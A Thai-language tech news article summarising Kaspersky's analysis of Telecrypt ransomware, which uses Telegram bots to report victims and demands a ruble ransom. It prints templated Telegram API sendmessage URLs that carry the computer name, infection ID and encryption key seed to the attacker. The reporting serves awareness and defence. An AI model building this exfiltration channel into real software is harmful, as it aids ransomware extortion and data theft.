TechTalkThai ศูนย์รวมข่าว Enterprise IT ออนไลน์แห่งแรกในประเทศไทย
นักวิจัยด้านความมั่นคงปลอดภัยจาก Kaspersky Lab ออกมาเปิดเผยถึง Ransomware ตัวใหม่ล่าสุด ชื่อว่า Telecrypt ซึ่งใช้ช่องทางของ Telegram แอพพลิเคชันสำหรับรับส่งข้อความที่มีความมั่นคงปลอดภัยสูง ในการส่งข้อมูลระหว่างมัลแวร์และแฮ็คเกอร์
Telecrypt ถูกพัฒนาขึ้นโดยใช้ภาษา Delphi ซึ่ง Binary มีขนาดเพียง 3 MB เท่านั้น หลังจากที่ Telecrypt ถูกติดตั้งลงบนเครื่องของเหยื่อแล้ว มันจะทำการสร้าง Telegram Bot ผ่านทาง Telegram API ซึ่ง Bot แต่ละตัวจะมี Token ID ที่ได้จาก API เป็นของตัวเอง
หลังจากที่เหยื่อกดรัน Telecrypt Binary ตัว Telegram Bot จะทำการ Ping ไปยัง Telegram API ผ่านทาง https://api.telegram.org/bot/GetMe เพื่อให้มั่นใจว่า Telegram Bot ยังคงทำงานได้ และไม่ถูก Telegram Admin จัดการ จากนั้น Telecrypt จะใช้โปรโตคอลของ Telegram ในการส่งข้อความผ่านเข้าไปยังช่องทางของ Telegram โดยใช้ Token ID ที่ได้รับมากในตอนแรก ซึ่งข้อความที่ส่งออกไปประกอบด้วย Computer Name, Infection ID และ Key Seed ซึ่งเป็นชุดตัวเลขที่ใช้เป็นกุญแจสำหรับเข้ารหัสไฟล์ข้อมูล
https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >
ถัดมา Telecrypt จะทำการค้นหาไฟล์ข้อมูล ได้แก่ DOC, DOCX, XLS, XLSX, JPG, JPEG, PNG, DT, DBF, CD และ PDF เพื่อทำการเข้ารหัส ซึ่งบางเวอร์ชันจะไม่ใส่นามสกุลใดต่อท้ายไฟล์ แต่บางเวอร์ชันจะใส่นามสกุล .Xcri เพิ่มเข้าไป เมื่อเข้ารหัสไฟล์ทั้งหมดเสร็จเรียบร้อย Telecrypt จะส่งข้อความไปช่องทางเดิม แต่เพิ่มพารามิเตอร์ Stop เข้าไปด้วย
https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >stop
จากนั้น Telecrypt จะดาวน์โหลดไฟล์ Xhelp.exe มาติดตั้งลงบนเครื่องของเหยื่อเพื่อแสดงข้อความเรียกค่าไถ่ดังรูปด้านล่าง
ข้อความเรียกค่าไถ่ถูกเขียนในภาษารัสเซีย และเรียกร้องเงินจำนวน 5,000 Rubles หรือประมาณ 2,800 บาท เพื่อปลดรหัสไฟล์ โดยให้ชำระเงินผ่านทาง Yandex.Money หรือ Qiwi ซึ่งเป็นช่องทางการชำระเงินยอดนิยมของรัสเซีย
ที่มา: https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/
